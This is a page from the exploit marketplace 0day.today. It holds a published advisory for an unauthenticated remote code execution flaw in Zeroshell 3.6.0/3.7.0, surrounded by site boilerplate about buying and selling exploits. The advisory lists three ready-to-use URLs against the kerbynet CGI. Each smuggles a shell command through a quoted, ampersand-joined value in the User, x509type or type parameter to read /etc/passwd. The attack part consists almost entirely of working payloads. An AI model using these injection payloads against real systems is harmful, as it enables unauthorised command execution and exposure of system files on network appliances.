0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution Vulnerability
#################################################################################################################################### # Exploit Title: Zeroshell - Net Services Unauthenticated Remote Code Execution | RCE # Date: 13.01.2017 # Exploit Author: Ozer Goker # Vendor Homepage: http://www.zeroshell.org # Software Link: www.zeroshell.org/download/ # Version: 3.6.0 & 3.7.0 #################################################################################################################################### Introduction Zeroshell is a small Linux distribution for servers and embedded devices with the aim to provide network services. It is available in the form of live CD or compact Flash image and it can be configured using a web browser. The main features of Zeroshell include: load balancing and failover of multiple Internet connections, UMTS/HSDPA connections by using 3G modems, RADIUS server for providing secure authentication and automatic management of encryption keys to wireless networks, captive portal to support web login, and many others. Vulnerabilities: Unauthenticated Remote Code Execution | RCE RCE details: #################################################################################################################################### RCE 1 URL http://192.168.0.75/cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW= METHOD Get,Post PARAMETER User PAYLOAD %27%26cat%20/etc/passwd%26%27 #################################################################################################################################### RCE 2 URL http://192.168.0.75/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%26cat%20/etc/passwd%26%27 METHOD Get PARAMETER x509type PAYLOAD %27%26cat%20/etc/passwd%26%27 #################################################################################################################################### RCE 3 URL http://192.168.0.75/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22%26cat%20/etc/passwd%26%22 METHOD Get PARAMETER type PAYLOAD %22%26cat%20/etc/passwd%26%22 # 0day.today [2024-12-26] #